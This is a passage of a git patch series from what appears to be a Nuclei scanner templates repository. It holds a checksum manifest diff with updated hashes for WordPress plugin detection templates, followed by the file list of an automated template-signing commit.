-http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 -http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 -http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d -http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 -http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad -http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 +http/technologies/wordpress/plugins/popup-maker.yaml:d8f5c75df0e09e528672fd0dcbdfe04e41401be3 +http/technologies/wordpress/plugins/post-smtp.yaml:8a0f5ae5c96ea3b82661c846c3203b4e671749a9 +http/technologies/wordpress/plugins/post-types-order.yaml:16a74446f0c19cf39e46bcdd4e86b81110660d6f +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:c6fadf9668cb06bc002adc934f2e665bdad9aa69 +http/technologies/wordpress/plugins/pretty-link.yaml:9099e7d0c95ee02494dcd6caf246affc36342fbe +http/technologies/wordpress/plugins/really-simple-captcha.yaml:458380ebe439db265867bc5e37ac986fa4efb246 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:907c0eefd98a869f90595134396c1e2631c4d7a2 +http/technologies/wordpress/plugins/redirection.yaml:ba6758f86ab5f696fcea55dee70c2dc1895a7742 +http/technologies/wordpress/plugins/redux-framework.yaml:758620c3dd3a6fcf33ca4bb69df4d8000607812d +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:7ed1c2c1f43f72ab6bd55552dd1567f854884ef2 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:1e8494c0ef97e886cfb799486f9003b68cbaa088 +http/technologies/wordpress/plugins/safe-svg.yaml:ef939b517816269875acb7dc84bc3096a5f79b9d +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:ee5d91e1bc123962d61fc0cb131160dd991a6cd7 +http/technologies/wordpress/plugins/sg-cachepress.yaml:9e7a7d8960923b24db783d830d484dcec0cab901 +http/technologies/wordpress/plugins/sg-security.yaml:efa1a0570332f393cfc525f3eb4e0548c92e322e +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:721459489b1f50bf54f614bd7d2705e45961975f +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:9e2123795d6521e8f97e3e57de4496e5195d1227 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:254ec2f86a4376ffa82a11e27b973ee0c3b20fc6 +http/technologies/wordpress/plugins/simple-history.yaml:e618775c77d82bf50abf8d2996a8db7b0c25ff32 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:1b506638fa568e33eb4b4d431ac50441e4d2f943 -http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f +http/technologies/wordpress/plugins/siteguard.yaml:c16fc6f054bdd78231f6a5cf5d795bd77a5b4f48 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:95e58194eebbc519657cc345dfc48c9874b1e8ed +http/technologies/wordpress/plugins/smart-slider-3.yaml:a086caae373717dd6bc697f404f224bfb7c3baab +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:c8e02063b37a9f8f467ed4058f45c64253c5a274 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e -http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:74d02a010811976b8fd6f22dc8ea33274dfbcdfe +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:0d692fdd61ebc94a1afaad0cf496ba5c46f7c3b2 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:83bd44a0d075d2208408fc1d78bfc5ec5cf153b7 +http/technologies/wordpress/plugins/svg-support.yaml:7fd94b5719bb15f4bc071945b9c97b26cab3dc7e http/technologies/wordpress/plugins/table-of-contents-plus.yaml:142cf7dc3d34ed35422ad91447b3f1f986d965b6 -http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 -http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d -http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab +http/technologies/wordpress/plugins/tablepress.yaml:b7ed7850941c5aa89758a5341ab9c7f2667534a7 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:e2780246cbc2816ae0337ea2a1f1da22dadbb88c +http/technologies/wordpress/plugins/templately.yaml:5d72b2b2d83b8b44856b16708475b6a89c25a7a8 +http/technologies/wordpress/plugins/the-events-calendar.yaml:439a1b7200a70013fa83f237795e6fedd27ec088 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 -http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:b52030e20304c5c9ee960c9d2952b3be2d68e542 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:945736adbb00b13e66054c0c99cb0273aff77a43 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:1f44b49ae2b3954d76cbeb097c106f1ff0113315 +http/technologies/wordpress/plugins/under-construction-page.yaml:1899ef111f3a69ca6e19d8c67bbf19717f643667 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 +http/technologies/wordpress/plugins/updraftplus.yaml:885995fc91fff0e4c7282dabc050cc8aafff6bf5 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 +http/technologies/wordpress/plugins/user-role-editor.yaml:2ddde1535ca92e0957d21072e8f18a24a0431f99 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 -http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/w3-total-cache.yaml:732fde96032f0b9cfa9017b4c3179ccb3bbb24ac +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:4d9c66372b8b16e23afc78bbfc413ead7d1dda26 +http/technologies/wordpress/plugins/webp-express.yaml:2e17b97016e5ac5c02883033d2c44c81ecf6d879 http/technologies/wordpress/plugins/widget-importer-exporter.yaml:6704a9b4d0dcda2afcbac6ec83aab1e38ff1f0dc -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:8ed2d07c932afe81b968f49f5eef5f4d0ee0b485 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0631841e93fa85997554b9f934ecec3a4305c122 http/technologies/wordpress/plugins/woo-inpost.yaml:ccc431985c9227d06dce6cd78efea4b46ddf791c -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:16eaefe33960e54407ce42cbcb2f6678c7cf09f6 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b -http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 -http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f -http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b -http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f -http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:097b3a0730180351943fb6854be82dd0309bb4a5 +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:2612fc6740219daca153546462f048792d471249 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:17d0837eed8c514bc7a018038d2fc79c7e5899cb +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:1fe21348d5eb063dad3d55f73dc5983e3c00fa0e +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:ba03c8714fd1be6c141e55e61df0af2e73ca1c73 +http/technologies/wordpress/plugins/woocommerce-services.yaml:1425abeb25c04b81ce840879d9b4efd5aa4386c5 +http/technologies/wordpress/plugins/woocommerce.yaml:498e777e6a0303f75646ad590389e413198bdc45 +http/technologies/wordpress/plugins/wordfence.yaml:73666d89eb1c95da6a6fbf9c6d68dae5195c8de9 +http/technologies/wordpress/plugins/wordpress-importer.yaml:f48772726515f815f42ba50895c620de392ebaee +http/technologies/wordpress/plugins/wordpress-seo.yaml:6a63c75ccfdba03388c457df971c780fc341c312 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c -http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 -http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-logging.yaml:43cc5e8e1534e83039984a4f1affb3c2552fe63f -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:10b7d3c96ef44d16cc9ab5da9eeed5395f11396d +http/technologies/wordpress/plugins/worker.yaml:119618b338cf9b154484b826d5ddb14b2bb6790a +http/technologies/wordpress/plugins/wp-crontrol.yaml:ea82b2bd854f65c6df566cd6dbda999d319b5523 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ef075151ba2c69920137548fcce063130f16c9ab +http/technologies/wordpress/plugins/wp-file-manager.yaml:c74dd7f6d9fa93943b9854f017d855ea9d5e1eb1 +http/technologies/wordpress/plugins/wp-google-maps.yaml:a6069ccb184507496cf0874abe9164439f9d6b7a +http/technologies/wordpress/plugins/wp-mail-logging.yaml:e45e9fac790ba44719fe51992b813f62e87e7671 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:f99de29d1961a8f9d22b8f1703604681114f9b3d +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:191d944fe0ca94688f14320bbc9503492ae68014 http/technologies/wordpress/plugins/wp-migrate-db.yaml:e4d387e29ada0961b3320d2b69e8773746ca268a -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:21e5aadc905520b62039c7a34f904f2cb88d565c +http/technologies/wordpress/plugins/wp-optimize.yaml:320d1a0b04c1829718fa3da2a020fd31e4e66623 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:dfca47bbc40bdcb30781c6229cfb5253f516bed0 +http/technologies/wordpress/plugins/wp-reset.yaml:b955d46112f52f5d5b7087511ede3809b35937dc +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:30c99b580ca27ccb6e1d1696715f76aadff55ace +http/technologies/wordpress/plugins/wp-rollback.yaml:a147886b718758fcae5fcc0b40105e471d534d6c +http/technologies/wordpress/plugins/wp-seopress.yaml:3414f320fa58af8a1960c3ff98a9a9b3eadc73b0 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:b05957e1effb8833dd9e1310e67721bb835e6510 +http/technologies/wordpress/plugins/wp-smushit.yaml:9ab9de263ae17e74f4b80f0678f32059a059abd2 +http/technologies/wordpress/plugins/wp-statistics.yaml:9bc21404112344af218d6171ed491aa057fdce69 +http/technologies/wordpress/plugins/wp-super-cache.yaml:c4faddd07e145d4b1935f43a9f18fb8672b7a154 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:b3846329af6b52784226ac763ea6adf7a47827b7 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:3804c6730dd1107b7aafbf5b7ead1ff3ae0e7624 +http/technologies/wordpress/plugins/wpforms-lite.yaml:9ad3f91053b68d9611248b0935e154e7718f4fcc +http/technologies/wordpress/plugins/wps-hide-login.yaml:f884fc4da166c76fddc03ff0117fcb3ba1355350 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:3c0d3469d559366b3f1de03f50cdb4d10fba0dd8 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:594e18cebb248432ca3b1059a04a41f96e71146d http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:cf9a544627bf169a3572f810cd893cecdfdaec2d http/technologies/wordpress-detect.yaml:743b35c9139a66a10e24776aabe59d58f5e4f63c http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -9489,7 +9489,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:53577732d5951c743ecf26e66717ac7cb9893bdd +templates-checksum.txt:e8b355329d0af9aa855dcb4393ef3bdf7bcc9489 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 97b58c969e6a158418b37e4236da93837cf14788 Mon Sep 17 00:00:00 2001 From: ghost Date: Thu, 17 Oct 2024 12:16:52 +0000 Subject: [PATCH 188/218] =?UTF-8?q?chore:=20sign=20templates=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- dast/vulnerabilities/sqli/time-based-sqli.yaml | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 3 +-- http/technologies/wordpress/plugins/add-to-any.yaml | 3 +-- http/technologies/wordpress/plugins/admin-menu-editor.yaml | 3 +-- .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 3 +-- http/technologies/wordpress/plugins/akismet.yaml | 3 +-- http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 3 +-- .../wordpress/plugins/all-in-one-wp-migration.yaml | 3 +-- .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 3 +-- http/technologies/wordpress/plugins/amp.yaml | 3 +-- http/technologies/wordpress/plugins/antispam-bee.yaml | 3 +-- http/technologies/wordpress/plugins/astra-sites.yaml | 3 +-- http/technologies/wordpress/plugins/autoptimize.yaml | 3 +-- http/technologies/wordpress/plugins/backwpup.yaml | 3 +-- http/technologies/wordpress/plugins/better-search-replace.yaml | 3 +-- http/technologies/wordpress/plugins/better-wp-security.yaml | 3 +-- .../wordpress/plugins/black-studio-tinymce-widget.yaml | 3 +-- http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 3 +-- http/technologies/wordpress/plugins/breeze.yaml | 3 +-- http/technologies/wordpress/plugins/broken-link-checker.yaml | 3 +-- http/technologies/wordpress/plugins/chaty.yaml | 3 +-- .../wordpress/plugins/child-theme-configurator.yaml | 3 +-- http/technologies/wordpress/plugins/classic-editor.yaml | 3 +-- http/technologies/wordpress/plugins/classic-widgets.yaml | 3 +-- .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 3 +-- http/technologies/wordpress/plugins/cmb2.yaml | 3 +-- http/technologies/wordpress/plugins/coblocks.yaml | 3 +-- http/technologies/wordpress/plugins/code-snippets.yaml | 3 +-- http/technologies/wordpress/plugins/coming-soon.yaml | 3 +-- http/technologies/wordpress/plugins/complianz-gdpr.yaml | 3 +-- .../wordpress/plugins/contact-form-7-honeypot.yaml | 3 +-- http/technologies/wordpress/plugins/contact-form-7.yaml | 3 +-- http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 3 +-- http/technologies/wordpress/plugins/cookie-law-info.yaml | 3 +-- http/technologies/wordpress/plugins/cookie-notice.yaml | 3 +-- http/technologies/wordpress/plugins/copy-delete-posts.yaml | 3 +-- http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 3 +-- .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 3 +-- http/technologies/wordpress/plugins/custom-css-js.yaml | 3 +-- http/technologies/wordpress/plugins/custom-fonts.yaml | 3 +-- http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 3 +-- http/technologies/wordpress/plugins/disable-comments.yaml | 3 +-- http/technologies/wordpress/plugins/disable-gutenberg.yaml | 3 +-- http/technologies/wordpress/plugins/duplicate-page.yaml | 3 +-- http/technologies/wordpress/plugins/duplicate-post.yaml | 3 +-- http/technologies/wordpress/plugins/duplicator.yaml | 3 +-- .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 3 +-- .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 3 +-- http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 3 +-- http/technologies/wordpress/plugins/elementor.yaml | 3 +-- http/technologies/wordpress/plugins/elementskit-lite.yaml | 3 +-- http/technologies/wordpress/plugins/enable-media-replace.yaml | 3 +-- http/technologies/wordpress/plugins/envato-elements.yaml | 3 +-- .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 3 +-- http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 3 +-- http/technologies/wordpress/plugins/extendify.yaml | 3 +-- .../wordpress/plugins/facebook-for-woocommerce.yaml | 3 +-- http/technologies/wordpress/plugins/fast-indexing-api.yaml | 3 +-- http/technologies/wordpress/plugins/flamingo.yaml | 3 +-- http/technologies/wordpress/plugins/fluent-smtp.yaml | 3 +-- http/technologies/wordpress/plugins/fluentform.yaml | 3 +-- http/technologies/wordpress/plugins/font-awesome.yaml | 3 +-- .../wordpress/plugins/force-regenerate-thumbnails.yaml | 3 +-- http/technologies/wordpress/plugins/formidable.yaml | 3 +-- http/technologies/wordpress/plugins/forminator.yaml | 3 +-- http/technologies/wordpress/plugins/ga-google-analytics.yaml | 3 +-- .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 3 +-- .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 3 +-- .../wordpress/plugins/google-analytics-for-wordpress.yaml | 3 +-- .../wordpress/plugins/google-listings-and-ads.yaml | 3 +-- http/technologies/wordpress/plugins/google-site-kit.yaml | 3 +-- .../wordpress/plugins/google-sitemap-generator.yaml | 3 +-- http/technologies/wordpress/plugins/gtranslate.yaml | 3 +-- http/technologies/wordpress/plugins/gutenberg.yaml | 3 +-- .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 3 +-- .../wordpress/plugins/header-footer-code-manager.yaml | 3 +-- .../wordpress/plugins/header-footer-elementor.yaml | 3 +-- http/technologies/wordpress/plugins/header-footer.yaml | 3 +-- http/technologies/wordpress/plugins/health-check.yaml | 3 +-- http/technologies/wordpress/plugins/hello-dolly.yaml | 3 +-- http/technologies/wordpress/plugins/host-webfonts-local.yaml | 3 +-- http/technologies/wordpress/plugins/hostinger.yaml | 3 +-- http/technologies/wordpress/plugins/image-optimization.yaml | 3 +-- http/technologies/wordpress/plugins/imagify.yaml | 3 +-- .../wordpress/plugins/insert-headers-and-footers.yaml | 3 +-- http/technologies/wordpress/plugins/instagram-feed.yaml | 3 +-- .../wordpress/plugins/intuitive-custom-post-order.yaml | 3 +-- http/technologies/wordpress/plugins/jetpack-boost.yaml | 3 +-- http/technologies/wordpress/plugins/jetpack.yaml | 3 +-- http/technologies/wordpress/plugins/kadence-blocks.yaml | 3 +-- http/technologies/wordpress/plugins/kirki.yaml | 3 +-- http/technologies/wordpress/plugins/leadin.yaml | 3 +-- .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 3 +-- http/technologies/wordpress/plugins/limit-login-attempts.yaml | 3 +-- http/technologies/wordpress/plugins/litespeed-cache.yaml | 3 +-- http/technologies/wordpress/plugins/loco-translate.yaml | 3 +-- http/technologies/wordpress/plugins/loginizer.yaml | 3 +-- .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 3 +-- http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 3 +-- http/technologies/wordpress/plugins/mailpoet.yaml | 3 +-- http/technologies/wordpress/plugins/maintenance.yaml | 3 +-- http/technologies/wordpress/plugins/mainwp-child.yaml | 3 +-- http/technologies/wordpress/plugins/malcare-security.yaml | 3 +-- http/technologies/wordpress/plugins/megamenu.yaml | 3 +-- http/technologies/wordpress/plugins/members.yaml | 3 +-- http/technologies/wordpress/plugins/meta-box.yaml | 3 +-- http/technologies/wordpress/plugins/metform.yaml | 3 +-- http/technologies/wordpress/plugins/ml-slider.yaml | 3 +-- http/technologies/wordpress/plugins/newsletter.yaml | 3 +-- .../wordpress/plugins/nextend-facebook-connect.yaml | 3 +-- http/technologies/wordpress/plugins/nextgen-gallery.yaml | 3 +-- http/technologies/wordpress/plugins/ninja-forms.yaml | 3 +-- http/technologies/wordpress/plugins/ocean-extra.yaml | 3 +-- .../wordpress/plugins/official-facebook-pixel.yaml | 3 +-- http/technologies/wordpress/plugins/one-click-demo-import.yaml | 3 +-- http/technologies/wordpress/plugins/optinmonster.yaml | 3 +-- http/technologies/wordpress/plugins/otter-blocks.yaml | 3 +-- http/technologies/wordpress/plugins/password-protected.yaml | 3 +-- http/technologies/wordpress/plugins/pdf-embedder.yaml | 3 +-- .../wordpress/plugins/pinterest-for-woocommerce.yaml | 3 +-- http/technologies/wordpress/plugins/pixelyoursite.yaml | 3 +-- http/technologies/wordpress/plugins/polylang.yaml | 3 +-- http/technologies/wordpress/plugins/popup-maker.yaml | 3 +-- http/technologies/wordpress/plugins/post-smtp.yaml | 3 +-- http/technologies/wordpress/plugins/post-types-order.yaml | 3 +-- .../wordpress/plugins/premium-addons-for-elementor.yaml | 3 +-- http/technologies/wordpress/plugins/pretty-link.yaml | 3 +-- http/technologies/wordpress/plugins/really-simple-captcha.yaml | 3 +-- http/technologies/wordpress/plugins/really-simple-ssl.yaml | 3 +-- http/technologies/wordpress/plugins/redirection.yaml | 3 +-- http/technologies/wordpress/plugins/redux-framework.yaml | 3 +-- http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 3 +-- .../technologies/wordpress/plugins/royal-elementor-addons.yaml | 3 +-- http/technologies/wordpress/plugins/safe-svg.yaml | 3 +-- http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 3 +-- http/technologies/wordpress/plugins/sg-cachepress.yaml | 3 +-- http/technologies/wordpress/plugins/sg-security.yaml | 3 +-- http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 3 +-- .../wordpress/plugins/shortpixel-image-optimiser.yaml | 3 +-- .../wordpress/plugins/simple-custom-post-order.yaml | 3 +-- http/technologies/wordpress/plugins/simple-history.yaml | 3 +-- http/technologies/wordpress/plugins/siteguard.yaml | 3 +-- http/technologies/wordpress/plugins/siteorigin-panels.yaml | 3 +-- http/technologies/wordpress/plugins/smart-slider-3.yaml | 3 +-- http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 3 +-- .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 3 +-- .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 3 +-- http/technologies/wordpress/plugins/sucuri-scanner.yaml | 3 +-- http/technologies/wordpress/plugins/svg-support.yaml | 3 +-- http/technologies/wordpress/plugins/tablepress.yaml | 3 +-- http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 3 +-- http/technologies/wordpress/plugins/templately.yaml | 3 +-- http/technologies/wordpress/plugins/the-events-calendar.yaml | 3 +-- http/technologies/wordpress/plugins/tinymce-advanced.yaml | 3 +-- .../wordpress/plugins/translatepress-multilingual.yaml | 3 +-- .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 3 +-- .../wordpress/plugins/under-construction-page.yaml | 3 +-- http/technologies/wordpress/plugins/updraftplus.yaml | 3 +-- http/technologies/wordpress/plugins/user-role-editor.yaml | 3 +-- 